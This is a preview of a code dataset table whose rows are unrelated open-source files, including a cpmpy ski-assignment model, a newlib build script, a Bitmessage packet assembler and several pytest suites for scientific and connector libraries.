max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
cpmpy/ski_assignment.py | tias/hakank | 279 | 12795286 | <gh_stars>100-1000
"""
Ski assignment in cpmpy
From <NAME>, Jr.:
PIC 60, Fall 2008 Final Review, December 12, 2008
http://www.math.ucla.edu/~jhellrun/course_files/Fall%25202008/PIC%252060%2520-%2520Data%2520Structures%2520and%2520Algorithms/final_review.pdf
'''
5. Ski Optimization! Your job at Snapple is pleasant but in the winter
you've decided to become a ski bum. You've hooked up with the Mount
Baldy Ski Resort. They'll let you ski all winter for free in exchange
for helping their ski rental shop with an algorithm to assign skis to
skiers. Ideally, each skier should obtain a pair of skis whose height
matches his or her own height exactly. Unfortunately, this is generally
not possible. We define the disparity between a skier and his or her
skis to be the absolute value of the difference between the height of
the skier and the pair of skis. Our objective is to find an assignment
of skis to skiers that minimizes the sum of the disparities.
...
Illustrate your algorithm by explicitly filling out the A[i, j] table
for the following sample data:
* Ski heights: 1, 2, 5, 7, 13, 21.
* Skier heights: 3, 4, 7, 11, 18.
'''
This cpmpy model was written by <NAME> (<EMAIL>)
See also my cpmpy page: http://hakank.org/cpmpy/
"""
from cpmpy import *
import cpmpy.solvers
import numpy as np
from cpmpy_hakank import *
def ski_assignment():
# data
num_skis = 6
num_skiers = 5
ski_heights = [1, 2, 5, 7, 13, 21]
skier_heights = [3, 4, 7, 11, 18]
# which ski to choose for each skier
x = intvar(0,num_skis-1,shape=num_skiers,name="x")
z = intvar(0, sum(ski_heights), name="z")
model = Model(minimize=z)
# constraints
model += [AllDifferent(x)]
# model += [z == sum([abs(ski_heights[x[i]] - skier_heights[i]) for i in range(num_skiers)] )]
model += [z == sum([abs(Element(ski_heights,x[i]) - skier_heights[i]) for i in range(num_skiers)] )]
ss = CPM_ortools(model)
num_solutions = 0
if ss.solve():
num_solutions += 1
print("total differences:", z.value())
for i in range(num_skiers):
x_val = x[i].value()
ski_height = ski_heights[x[i].value()]
diff = ski_height - skier_heights[i]
print('Skier %i: Ski %i with length %2i (diff: %2i)' %\
(i, x_val, ski_height, diff))
print()
print()
print('num_solutions:', num_solutions)
return ss
ss = ski_assignment()
|
plugins/supervisor/__init__.py | ajenti/ajen | 3,777 | 12795309 | <gh_stars>1000+
# pyflakes: disable-all
from .api import *
from .aug import *
from .main import *
|
aries_cloudagent/did/tests/test_did_key_bls12381g1.py | kuraakhilesh8230/aries-cloudagent-python | 247 | 12795332 | from unittest import TestCase
from ...wallet.key_type import KeyType
from ...wallet.util import b58_to_bytes
from ..did_key import DIDKey, DID_KEY_RESOLVERS
from .test_dids import (
DID_B<KEY>,
)
TEST_BLS12381G1_BASE58_KEY = (
"<KEY>"
)
TEST_BLS12381G1_FINGERPRINT = (
"<KEY>"
)
TEST_BLS12381G1_DID = f"did:key:{TEST_BLS12381G1_FINGERPRINT}"
TEST_BLS12381G1_KEY_ID = f"{TEST_BLS12381G1_DID}#{TEST_BLS12381G1_FINGERPRINT}"
TEST_BLS12381G1_PREFIX_BYTES = b"".join(
[b"\xea\x01", b58_to_bytes(TEST_BLS12381G1_BASE58_KEY)]
)
class TestDIDKey(TestCase):
def test_bls12381g1_from_public_key(self):
key_bytes = b58_to_bytes(TEST_BLS12381G1_BASE58_KEY)
did_key = DIDKey.from_public_key(key_bytes, KeyType.BLS12381G1)
assert did_key.did == TEST_BLS12381G1_DID
def test_bls12381g1_from_public_key_b58(self):
did_key = DIDKey.from_public_key_b58(
TEST_BLS12381G1_BASE58_KEY, KeyType.BLS12381G1
)
assert did_key.did == TEST_BLS12381G1_DID
def test_bls12381g1_from_fingerprint(self):
did_key = DIDKey.from_fingerprint(TEST_BLS12381G1_FINGERPRINT)
assert did_key.did == TEST_BLS12381G1_DID
assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY
def test_bls12381g1_from_did(self):
did_key = DIDKey.from_did(TEST_BLS12381G1_DID)
assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY
def test_bls12381g1_properties(self):
did_key = DIDKey.from_did(TEST_BLS12381G1_DID)
assert did_key.fingerprint == TEST_BLS12381G1_FINGERPRINT
assert did_key.did == TEST_BLS12381G1_DID
assert did_key.public_key_b58 == TEST_BLS12381G1_BASE58_KEY
assert did_key.public_key == b58_to_bytes(TEST_BLS12381G1_BASE58_KEY)
assert did_key.key_type == KeyType.BLS12381G1
assert did_key.key_id == TEST_BLS12381G1_KEY_ID
assert did_key.prefixed_public_key == TEST_BLS12381G1_PREFIX_BYTES
def test_bls12381g1_diddoc(self):
did_key = DIDKey.from_did(TEST_BLS12381G1_DID)
resolver = DID_KEY_RESOLVERS[KeyType.BLS12381G1]
assert resolver(did_key) == did_key.did_doc
def test_bls12381g1_resolver(self):
did_key = DIDKey.from_did(TEST_BLS12381G1_DID)
resolver = DID_KEY_RESOLVERS[KeyType.BLS12381G1]
did_doc = resolver(did_key)
assert (
did_doc
== DID_BLS12381G1_z3tEFALUKUzzCAvytMHX8X4SnsNsq6T5tC5Zb18oQEt1FqNcJXqJ3AA9umgzA9yoqPBeWA
)
|
qb_to_dynaboard.py | Pinafore/qb | 122 | 12795346 | <gh_stars>100-1000
import argparse
import json
from pathlib import Path
DS_VERSION = "2018.04.18"
LOCAL_QANTA_PREFIX = "data/external/datasets/"
QANTA_TRAIN_DATASET_PATH = f"qanta.train.{DS_VERSION}.json"
QANTA_DEV_DATASET_PATH = f"qanta.dev.{DS_VERSION}.json"
QANTA_TEST_DATASET_PATH = f"qanta.test.{DS_VERSION}.json"
def main():
parser = argparse.ArgumentParser()
parser.add_argument('output_dir', type=str)
args = parser.parse_args()
output_dir = Path(args.output_dir)
output_dir.mkdir(exist_ok=True, parents=True)
for split, path in [('train', QANTA_TRAIN_DATASET_PATH), ('dev', QANTA_DEV_DATASET_PATH), ('test', QANTA_TEST_DATASET_PATH)]:
with open(Path(LOCAL_QANTA_PREFIX) / path) as f:
data = json.load(f)
output = []
for q in data['questions']:
output.append({'uid': q['qanta_id'], 'question': q['text'], 'answer': q['page'], 'context': ''})
with open(output_dir / f'qb-{split}-{DS_VERSION}.jsonl', 'w') as f:
for r in output:
f.write(f'{json.dumps(r)}\n')
if __name__ == '__main__':
main() |
tests/test_microsoft_trans.py | nidhaloff/deep_translator | 118 | 12795365 | <filename>tests/test_microsoft_trans.py
#!/usr/bin/env python
"""Tests for `deep_translator` package."""
from unittest.mock import patch
import pytest
import requests
from deep_translator import MicrosoftTranslator, exceptions
# mocked request.post
@patch.object(requests, "post")
def test_microsoft_successful_post_mock(mock_request_post):
returned_json = [{"translations": [{"text": "See you later!", "to": "en"}]}]
def res():
r = requests.Response()
def json_func():
return returned_json
r.json = json_func
return r
mock_request_post.return_value = res()
assert (
MicrosoftTranslator(api_key="an_api_key", source="de", target="en").translate(
"auf wiedersehen!"
)
== "See you later!"
)
def test_MicrosoftAPIerror():
with pytest.raises(exceptions.MicrosoftAPIerror):
MicrosoftTranslator(api_key="empty", source="de", target="en").translate("text")
# the remaining tests are actual requests to Microsoft API and use an api key
# if APIkey variable is None, they are skipped
APIkey = None
@pytest.mark.skipif(APIkey is None, reason="api_key is not provided")
def test_microsoft_successful_post_onetarget():
posted = MicrosoftTranslator(api_key=APIkey, target="en").translate(
"auf wiedersehen!"
)
assert isinstance(posted, str)
@pytest.mark.skipif(APIkey is None, reason="api_key is not provided")
def test_microsoft_successful_post_twotargets():
posted = MicrosoftTranslator(api_key=APIkey, target=["en", "ru"]).translate(
"auf wiedersehen!"
)
assert isinstance(posted, str)
@pytest.mark.skipif(APIkey is None, reason="api_key is not provided")
def test_incorrect_target_attributes():
with pytest.raises(exceptions.ServerException):
MicrosoftTranslator(api_key=APIkey, target="")
with pytest.raises(exceptions.ServerException):
MicrosoftTranslator(api_key="", target="nothing")
@pytest.mark.skipif(APIkey is None, reason="api_key is not provided")
def test_abbreviations():
m1 = MicrosoftTranslator(api_key=APIkey, source="en", target="fr")
m2 = MicrosoftTranslator(api_key=APIkey, source="English", target="French")
assert "".join(m1._source) == "".join(m2._source)
assert "".join(m1._target) == "".join(m2._target)
|
build_newlib.py | codyd51/axle | 453 | 12795366 | <reponame>codyd51/axle<filename>build_newlib.py
#!/usr/bin/python3
import os
import tempfile
from pathlib import Path
from typing import Tuple
from build_utils import download_and_unpack_archive, run_and_check
def clone_tool_and_prepare_build_dir(build_dir: Path, url: str) -> Tuple[Path, Path]:
tool_src_dir = download_and_unpack_archive(build_dir, url)
tool_name = url.split("/")[-1].removesuffix(".tar.gz")
tool_build_dir = build_dir / f"build-{tool_name}"
tool_build_dir.mkdir(exist_ok=True)
return tool_src_dir, tool_build_dir
def build() -> None:
axle_dir = Path(__file__).parent
sysroot_dir = axle_dir / "axle-sysroot"
arch_target = "i686-elf"
toolchain_dir = axle_dir / "i686-toolchain"
binaries_dir = toolchain_dir / "bin"
with tempfile.TemporaryDirectory() as build_dir_raw:
build_dir = Path(build_dir_raw)
build_products_dir = Path(__file__).parent / "newlib-build-products"
if False:
automake_src_dir, automake_build_dir = clone_tool_and_prepare_build_dir(
build_dir, "https://ftp.gnu.org/gnu/automake/automake-1.11.tar.gz"
)
automake_configure_path = automake_src_dir / "configure"
run_and_check(
[automake_configure_path.as_posix(), f"--prefix={build_products_dir}"], cwd=automake_build_dir
)
run_and_check(["make"], cwd=automake_build_dir)
run_and_check(["make", "install"], cwd=automake_build_dir)
autoconf_src_dir, autoconf_build_dir = clone_tool_and_prepare_build_dir(
build_dir, "https://ftp.gnu.org/gnu/autoconf/autoconf-2.65.tar.gz"
)
autoconf_configure_path = autoconf_src_dir / "configure"
run_and_check(
[autoconf_configure_path.as_posix(), f"--prefix={build_products_dir}"], cwd=autoconf_build_dir
)
run_and_check(["make"], cwd=autoconf_build_dir)
run_and_check(["make", "install"], cwd=autoconf_build_dir)
newlib_src_dir = axle_dir / "ports" / "newlib" / "newlib-2.5.0.20171222"
newlib_build_dir = build_dir / "build-newlib"
newlib_build_dir.mkdir()
os.symlink((binaries_dir / "i686-elf-ar").as_posix(), (newlib_build_dir / "i686-axle-ar").as_posix())
os.symlink((binaries_dir / "i686-elf-as").as_posix(), (newlib_build_dir / "i686-axle-as").as_posix())
os.symlink((binaries_dir / "i686-elf-gcc").as_posix(), (newlib_build_dir / "i686-axle-gcc").as_posix())
os.symlink((binaries_dir / "i686-elf-cc").as_posix(), (newlib_build_dir / "i686-axle-cc").as_posix())
os.symlink((binaries_dir / "i686-elf-ranlib").as_posix(), (newlib_build_dir / "i686-axle-ranlib").as_posix())
env = {"PATH": f'{newlib_build_dir}:{os.environ["PATH"]}'}
newlib_configure_path = newlib_src_dir / "configure"
run_and_check(
[newlib_configure_path.as_posix(), "--prefix=/usr", "--target=i686-axle"],
cwd=newlib_build_dir,
env_additions=env,
)
run_and_check(["make", "all"], cwd=newlib_build_dir, env_additions=env)
run_and_check(["make", f"DESTDIR={sysroot_dir.as_posix()}", "install"], cwd=newlib_build_dir, env_additions=env)
# If you make some kind of config change to the axle target, such as adding new files within the newlib port,
# you may have to run this command
# You may see an error like the following while running this script:
# /bin/sh: /Users/philliptennen/Documents/develop/axle/ports/newlib/newlib-2.5.0.20171222/etc/configure: No such file or directory
# ../newlib-2.5.0.20171222/configure --prefix=/usr --target=i686-axle
# Fail when newlib doesn't compile
# set -e
# make all
if __name__ == "__main__":
build()
|
berts_of_a_feather/files_for_replication/process_test_results.py | tommccoy1/hans | 109 | 12795393 | import sys
prefix = sys.argv[1]
fi = open(prefix + "/" + "test_results.tsv", "r")
fo = open(prefix + "/" + "preds.txt", "w")
fo.write("pairID,gold_label\n")
counter = 0
labels = ["contradiction", "entailment", "neutral"]
for line in fi:
parts = [float(x) for x in line.strip().split("\t")]
max_ind = 0
max_val = parts[0]
for ind, part in enumerate(parts):
if part > max_val:
max_val = part
max_ind = ind
fo.write("ex" + str(counter) + "," + labels[max_ind] + "\n")
counter += 1
|
reboot_required/tests/test_reboot_required.py | divyamamgai/integrations-extras | 158 | 12795426 | # (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
from os.path import isfile
def test_ok(aggregator, check, instance_ok):
assert isfile(instance_ok['created_at_file'])
check.check(instance_ok)
aggregator.assert_service_check('system.reboot_required', status=check.OK)
def test_not_present_ok(aggregator, check, instance_not_present):
assert not isfile(instance_not_present['created_at_file'])
check.check(instance_not_present)
aggregator.assert_service_check('system.reboot_required', status=check.OK)
def test_warning(aggregator, check, instance_warning):
check.check(instance_warning)
aggregator.assert_service_check('system.reboot_required', status=check.WARNING)
def test_critical(aggregator, check, instance_critical):
check.check(instance_critical)
aggregator.assert_service_check('system.reboot_required', status=check.CRITICAL)
|
src/network/assemble.py | BeholdersEye/PyBitmessage | 1,583 | 12795427 | <gh_stars>1000+
"""
Create bitmessage protocol command packets
"""
import struct
import addresses
from network.constants import MAX_ADDR_COUNT
from network.node import Peer
from protocol import CreatePacket, encodeHost
def assemble_addr(peerList):
"""Create address command"""
if isinstance(peerList, Peer):
peerList = [peerList]
if not peerList:
return b''
retval = b''
for i in range(0, len(peerList), MAX_ADDR_COUNT):
payload = addresses.encodeVarint(len(peerList[i:i + MAX_ADDR_COUNT]))
for stream, peer, timestamp in peerList[i:i + MAX_ADDR_COUNT]:
# 64-bit time
payload += struct.pack('>Q', timestamp)
payload += struct.pack('>I', stream)
# service bit flags offered by this node
payload += struct.pack('>q', 1)
payload += encodeHost(peer.host)
# remote port
payload += struct.pack('>H', peer.port)
retval += CreatePacket('addr', payload)
return retval
|
src/oci/apm_traces/models/query_result_metadata_summary.py | Manny27nyc/oci-python-sdk | 249 | 12795454 | <gh_stars>100-1000
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class QueryResultMetadataSummary(object):
"""
Summary containing the metadata about the query result set.
"""
def __init__(self, **kwargs):
"""
Initializes a new QueryResultMetadataSummary object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param query_result_row_type_summaries:
The value to assign to the query_result_row_type_summaries property of this QueryResultMetadataSummary.
:type query_result_row_type_summaries: list[oci.apm_traces.models.QueryResultRowTypeSummary]
:param source_name:
The value to assign to the source_name property of this QueryResultMetadataSummary.
:type source_name: str
:param query_results_grouped_by:
The value to assign to the query_results_grouped_by property of this QueryResultMetadataSummary.
:type query_results_grouped_by: list[oci.apm_traces.models.QueryResultsGroupedBySummary]
:param query_results_ordered_by:
The value to assign to the query_results_ordered_by property of this QueryResultMetadataSummary.
:type query_results_ordered_by: list[oci.apm_traces.models.QueryResultsOrderedBySummary]
:param time_series_interval_in_mins:
The value to assign to the time_series_interval_in_mins property of this QueryResultMetadataSummary.
:type time_series_interval_in_mins: int
"""
self.swagger_types = {
'query_result_row_type_summaries': 'list[QueryResultRowTypeSummary]',
'source_name': 'str',
'query_results_grouped_by': 'list[QueryResultsGroupedBySummary]',
'query_results_ordered_by': 'list[QueryResultsOrderedBySummary]',
'time_series_interval_in_mins': 'int'
}
self.attribute_map = {
'query_result_row_type_summaries': 'queryResultRowTypeSummaries',
'source_name': 'sourceName',
'query_results_grouped_by': 'queryResultsGroupedBy',
'query_results_ordered_by': 'queryResultsOrderedBy',
'time_series_interval_in_mins': 'timeSeriesIntervalInMins'
}
self._query_result_row_type_summaries = None
self._source_name = None
self._query_results_grouped_by = None
self._query_results_ordered_by = None
self._time_series_interval_in_mins = None
@property
def query_result_row_type_summaries(self):
"""
Gets the query_result_row_type_summaries of this QueryResultMetadataSummary.
A collection of QueryResultRowTypeSummary objects that describe the type and properties of the individual row elements of the query rows
being returned. The ith element in this list contains the QueryResultRowTypeSummary of the ith key value pair in the QueryResultRowData map.
:return: The query_result_row_type_summaries of this QueryResultMetadataSummary.
:rtype: list[oci.apm_traces.models.QueryResultRowTypeSummary]
"""
return self._query_result_row_type_summaries
@query_result_row_type_summaries.setter
def query_result_row_type_summaries(self, query_result_row_type_summaries):
"""
Sets the query_result_row_type_summaries of this QueryResultMetadataSummary.
A collection of QueryResultRowTypeSummary objects that describe the type and properties of the individual row elements of the query rows
being returned. The ith element in this list contains the QueryResultRowTypeSummary of the ith key value pair in the QueryResultRowData map.
:param query_result_row_type_summaries: The query_result_row_type_summaries of this QueryResultMetadataSummary.
:type: list[oci.apm_traces.models.QueryResultRowTypeSummary]
"""
self._query_result_row_type_summaries = query_result_row_type_summaries
@property
def source_name(self):
"""
Gets the source_name of this QueryResultMetadataSummary.
Source of the query result set (traces, spans, etc).
:return: The source_name of this QueryResultMetadataSummary.
:rtype: str
"""
return self._source_name
@source_name.setter
def source_name(self, source_name):
"""
Sets the source_name of this QueryResultMetadataSummary.
Source of the query result set (traces, spans, etc).
:param source_name: The source_name of this QueryResultMetadataSummary.
:type: str
"""
self._source_name = source_name
@property
def query_results_grouped_by(self):
"""
Gets the query_results_grouped_by of this QueryResultMetadataSummary.
Columns or attributes of the query rows which are group by values. This is a list of ResultsGroupedBy summary objects,
and the list will contain as many elements as the attributes and aggregate functions in the group by clause in the select query.
:return: The query_results_grouped_by of this QueryResultMetadataSummary.
:rtype: list[oci.apm_traces.models.QueryResultsGroupedBySummary]
"""
return self._query_results_grouped_by
@query_results_grouped_by.setter
def query_results_grouped_by(self, query_results_grouped_by):
"""
Sets the query_results_grouped_by of this QueryResultMetadataSummary.
Columns or attributes of the query rows which are group by values. This is a list of ResultsGroupedBy summary objects,
and the list will contain as many elements as the attributes and aggregate functions in the group by clause in the select query.
:param query_results_grouped_by: The query_results_grouped_by of this QueryResultMetadataSummary.
:type: list[oci.apm_traces.models.QueryResultsGroupedBySummary]
"""
self._query_results_grouped_by = query_results_grouped_by
@property
def query_results_ordered_by(self):
"""
Gets the query_results_ordered_by of this QueryResultMetadataSummary.
Order by which the query results are organized. This is a list of queryResultsOrderedBy summary objects, and the list
will contain more than one OrderedBy summary object, if the sort was multidimensional.
:return: The query_results_ordered_by of this QueryResultMetadataSummary.
:rtype: list[oci.apm_traces.models.QueryResultsOrderedBySummary]
"""
return self._query_results_ordered_by
@query_results_ordered_by.setter
def query_results_ordered_by(self, query_results_ordered_by):
"""
Sets the query_results_ordered_by of this QueryResultMetadataSummary.
Order by which the query results are organized. This is a list of queryResultsOrderedBy summary objects, and the list
will contain more than one OrderedBy summary object, if the sort was multidimensional.
:param query_results_ordered_by: The query_results_ordered_by of this QueryResultMetadataSummary.
:type: list[oci.apm_traces.models.QueryResultsOrderedBySummary]
"""
self._query_results_ordered_by = query_results_ordered_by
@property
def time_series_interval_in_mins(self):
"""
Gets the time_series_interval_in_mins of this QueryResultMetadataSummary.
Interval for the time series function in minutes.
:return: The time_series_interval_in_mins of this QueryResultMetadataSummary.
:rtype: int
"""
return self._time_series_interval_in_mins
@time_series_interval_in_mins.setter
def time_series_interval_in_mins(self, time_series_interval_in_mins):
"""
Sets the time_series_interval_in_mins of this QueryResultMetadataSummary.
Interval for the time series function in minutes.
:param time_series_interval_in_mins: The time_series_interval_in_mins of this QueryResultMetadataSummary.
:type: int
"""
self._time_series_interval_in_mins = time_series_interval_in_mins
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
queue/queue.py | Sherlock-dev/algos | 1,126 | 12795467 | class Queue(object):
def __init__(self):
self._list = []
def count(self):
return len(self._list)
def is_empty(self):
return self.count() == 0
def enqueue(self, item):
self._list.append(item)
def dequeue(self):
try:
return self._list.pop(0)
except IndexError:
raise IndexError('pop from empty stack')
def main():
queue = Queue()
n = 100
print('Empty queue: {0}'.format(queue.is_empty()))
while queue.count() < 5:
print('pushing elements: {0}'.format(n))
queue.enqueue(n)
n = n + 100
print('Number of items: {0}'.format(queue.count()))
print('Empty queue: {0}'.format(queue.is_empty()))
while True:
try:
print('Removing element: {0}'.format(queue.dequeue()))
except Exception as e:
print('Exception: {0}'.format(e))
break
print('Number of items: {0}'.format(queue.count()))
print('Empty queue: {0}'.format(queue.is_empty()))
if __name__ == '__main__':
main()
|
mpire/signal.py | synapticarbors/mpire | 505 | 12795499 | from inspect import Traceback
from signal import getsignal, SIG_IGN, SIGINT, signal as signal_, Signals
from types import FrameType
from typing import Type
class DelayedKeyboardInterrupt:
def __init__(self, in_thread: bool = False) -> None:
"""
:param in_thread: Whether or not we're living in a thread or not
"""
self.in_thread = in_thread
self.signal_received = None
def __enter__(self) -> None:
# When we're in a thread we can't use signal handling
if not self.in_thread:
self.signal_received = False
self.old_handler = signal_(SIGINT, self.handler)
def handler(self, sig: Signals, frame: FrameType) -> None:
self.signal_received = (sig, frame)
def __exit__(self, exc_type: Type, exc_val: Exception, exc_tb: Traceback) -> None:
if not self.in_thread:
signal_(SIGINT, self.old_handler)
if self.signal_received:
self.old_handler(*self.signal_received)
class DisableKeyboardInterruptSignal:
def __enter__(self) -> None:
# Prevent signal from propagating to child process
self._handler = getsignal(SIGINT)
ignore_keyboard_interrupt()
def __exit__(self, exc_type: Type, exc_val: Exception, exc_tb: Traceback) -> None:
# Restore signal
signal_(SIGINT, self._handler)
def ignore_keyboard_interrupt():
signal_(SIGINT, SIG_IGN)
|
airbyte-integrations/bases/source-acceptance-test/source_acceptance_test/tests/test_full_refresh.py | koji-m/airbyte | 6,215 | 12795507 | <filename>airbyte-integrations/bases/source-acceptance-test/source_acceptance_test/tests/test_full_refresh.py
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import pytest
from airbyte_cdk.models import Type
from source_acceptance_test.base import BaseTest
from source_acceptance_test.utils import ConnectorRunner, full_refresh_only_catalog, serialize
@pytest.mark.default_timeout(20 * 60)
class TestFullRefresh(BaseTest):
def test_sequential_reads(self, connector_config, configured_catalog, docker_runner: ConnectorRunner, detailed_logger):
configured_catalog = full_refresh_only_catalog(configured_catalog)
output = docker_runner.call_read(connector_config, configured_catalog)
records_1 = [message.record.data for message in output if message.type == Type.RECORD]
output = docker_runner.call_read(connector_config, configured_catalog)
records_2 = [message.record.data for message in output if message.type == Type.RECORD]
output_diff = set(map(serialize, records_1)) - set(map(serialize, records_2))
if output_diff:
msg = "The two sequential reads should produce either equal set of records or one of them is a strict subset of the other"
detailed_logger.info(msg)
detailed_logger.log_json_list(output_diff)
pytest.fail(msg)
|
gammapy/astro/population/tests/test_simulate.py | Rishank2610/gammapy | 155 | 12795523 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
from numpy.testing import assert_allclose, assert_equal
import astropy.units as u
from astropy.table import Table
from gammapy.astro.population import (
add_observed_parameters,
add_pulsar_parameters,
add_pwn_parameters,
add_snr_parameters,
make_base_catalog_galactic,
make_catalog_random_positions_cube,
make_catalog_random_positions_sphere,
)
def test_make_catalog_random_positions_cube():
table = make_catalog_random_positions_cube(random_state=0)
d = table[0]
assert len(table) == 100
assert len(table.colnames) == 3
assert table["x"].unit == "pc"
assert_allclose(d["x"], 0.0976270078546495)
assert table["y"].unit == "pc"
assert_allclose(d["y"], 0.3556330735924602)
assert table["z"].unit == "pc"
assert_allclose(d["z"], -0.37640823601179485)
table = make_catalog_random_positions_cube(dimension=2, random_state=0)
assert_equal(table["z"], 0)
table = make_catalog_random_positions_cube(dimension=1, random_state=0)
assert_equal(table["y"], 0)
assert_equal(table["z"], 0)
def test_make_catalog_random_positions_sphere():
table = make_catalog_random_positions_sphere(random_state=0)
d = table[0]
assert len(table) == 100
assert len(table.colnames) == 3
assert table["lon"].unit == "rad"
assert_allclose(d["lon"], 3.4482969442579128)
assert table["lat"].unit == "rad"
assert_allclose(d["lat"], 0.36359133530192267)
assert table["distance"].unit == "pc"
assert_allclose(d["distance"], 0.6780943487897606)
def test_make_base_catalog_galactic():
table = make_base_catalog_galactic(n_sources=10, random_state=0)
d = table[0]
assert len(table) == 10
assert len(table.colnames) == 13
assert table["age"].unit == "yr"
assert_allclose(d["age"], 548813.50392732478)
assert table["n_ISM"].unit == "cm-3"
assert_allclose(d["n_ISM"], 1.0)
assert table["spiralarm"].unit is None
assert d["spiralarm"] == "Crux Scutum"
assert table["x_birth"].unit == "kpc"
assert_allclose(d["x_birth"], -5.856461, atol=1e-5)
assert table["y_birth"].unit == "kpc"
assert_allclose(d["y_birth"], 3.017292, atol=1e-5)
assert table["z_birth"].unit == "kpc"
assert_allclose(d["z_birth"], 0.049088, atol=1e-5)
assert table["x"].unit == "kpc"
assert_allclose(d["x"], -5.941061, atol=1e-5)
assert table["y"].unit == "kpc"
assert_allclose(d["y"], 3.081642, atol=1e-5)
assert table["z"].unit == "kpc"
assert_allclose(d["z"], 0.023161, atol=1e-5)
assert table["vx"].unit == "km/s"
assert_allclose(d["vx"], -150.727104, atol=1e-5)
assert table["vy"].unit == "km/s"
assert_allclose(d["vy"], 114.648494, atol=1e-5)
assert table["vz"].unit == "km/s"
assert_allclose(d["vz"], -46.193814, atol=1e-5)
assert table["v_abs"].unit == "km/s"
assert_allclose(d["v_abs"], 194.927693, atol=1e-5)
def test_add_snr_parameters():
table = Table()
table["age"] = [100, 1000] * u.yr
table["n_ISM"] = u.Quantity(1, "cm-3")
table = add_snr_parameters(table)
assert len(table) == 2
assert table.colnames == ["age", "n_ISM", "E_SN", "r_out", "r_in", "L_SNR"]
assert table["E_SN"].unit == "erg"
assert_allclose(table["E_SN"], 1e51)
assert table["r_out"].unit == "pc"
assert_allclose(table["r_out"], [1, 3.80730787743])
assert table["r_in"].unit == "pc"
assert_allclose(table["r_in"], [0.9086, 3.45931993743])
assert table["L_SNR"].unit == "1 / s"
assert_allclose(table["L_SNR"], [0, 1.0768e33])
def test_add_pulsar_parameters():
table = Table()
table["age"] = [100, 1000] * u.yr
table = add_pulsar_parameters(table, random_state=0)
assert len(table) == 2
assert len(table.colnames) == 10
assert table["age"].unit == "yr"
assert_allclose(table["age"], [100, 1000])
assert table["P0"].unit == "s"
assert_allclose(table["P0"], [0.214478, 0.246349], atol=1e-5)
assert table["P1"].unit == ""
assert_allclose(table["P1"], [6.310423e-13, 4.198294e-16], atol=1e-5)
assert table["P0_birth"].unit == "s"
assert_allclose(table["P0_birth"], [0.212418, 0.246336], atol=1e-5)
assert table["P1_birth"].unit == ""
assert_allclose(table["P1_birth"], [6.558773e-13, 4.199198e-16], atol=1e-5)
assert table["CharAge"].unit == "yr"
assert_allclose(table["CharAge"], [2.207394e-21, 1.638930e-24], atol=1e-5)
assert table["Tau0"].unit == "yr"
assert_allclose(table["Tau0"], [5.131385e03, 9.294538e06], atol=1e-5)
assert table["L_PSR"].unit == "erg / s"
assert_allclose(table["L_PSR"], [2.599229e36, 1.108788e33], rtol=1e-5)
assert table["L0_PSR"].unit == "erg / s"
assert_allclose(table["L0_PSR"], [2.701524e36, 1.109026e33], rtol=1e-5)
assert table["B_PSR"].unit == "G"
assert_allclose(table["B_PSR"], [1.194420e13, 3.254597e11], rtol=1e-5)
def test_add_pwn_parameters():
table = make_base_catalog_galactic(n_sources=10, random_state=0)
# To compute PWN parameters we need PSR and SNR parameters first
table = add_snr_parameters(table)
table = add_pulsar_parameters(table, random_state=0)
table = add_pwn_parameters(table)
d = table[0]
assert len(table) == 10
assert len(table.colnames) == 27
assert table["r_out_PWN"].unit == "pc"
assert_allclose(d["r_out_PWN"], 1.378224, atol=1e-4)
def test_add_observed_parameters():
table = make_base_catalog_galactic(n_sources=10, random_state=0)
table = add_observed_parameters(table)
d = table[0]
assert len(table) == 10
assert len(table.colnames) == 20
assert table["distance"].unit == "pc"
assert_allclose(d["distance"], 13016.572756, atol=1e-5)
assert table["GLON"].unit == "deg"
assert_allclose(d["GLON"], -27.156565, atol=1e-5)
assert table["GLAT"].unit == "deg"
assert_allclose(d["GLAT"], 0.101948, atol=1e-5)
assert table["VGLON"].unit == "deg / Myr"
assert_allclose(d["VGLON"], 0.368166, atol=1e-5)
assert table["VGLAT"].unit == "deg / Myr"
assert_allclose(d["VGLAT"], -0.209514, atol=1e-5)
assert table["RA"].unit == "deg"
assert_allclose(d["RA"], 244.347149, atol=1e-5)
assert table["DEC"].unit == "deg"
assert_allclose(d["DEC"], -50.410142, atol=1e-5)
def test_chain_all():
# Test that running the simulation functions in chain works
table = make_base_catalog_galactic(n_sources=10, random_state=0)
table = add_snr_parameters(table)
table = add_pulsar_parameters(table, random_state=0)
table = add_pwn_parameters(table)
table = add_observed_parameters(table)
d = table[0]
# Note: the individual functions are tested above.
# Here we just run them in a chain and do very basic asserts
# on the output so that we make sure we notice changes.
assert len(table) == 10
assert len(table.colnames) == 34
assert table["r_out_PWN"].unit == "pc"
assert_allclose(d["r_out_PWN"], 1.378224, atol=1e-4)
assert table["RA"].unit == "deg"
assert_allclose(d["RA"], 244.347149, atol=1e-5)
|
tables/wikipedia-scripts/weblib/web.py | yash-srivastava19/sempre | 812 | 12795536 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib, urllib2, urlparse, socket
import json, sys, os, hashlib, subprocess, time
from blacklist import BLACKLIST
BASEDIR = os.path.dirname(os.path.realpath(os.path.join(__file__, '..')))
class WebpageCache(object):
def __init__(self, basedir=BASEDIR, dirname='web.cache', log=True, timeout=15):
self.cachePath = os.path.join(basedir, dirname)
if not os.path.exists(self.cachePath):
os.mkdir(self.cachePath)
self.log = log
self.cache_miss = False
self.timeout = timeout
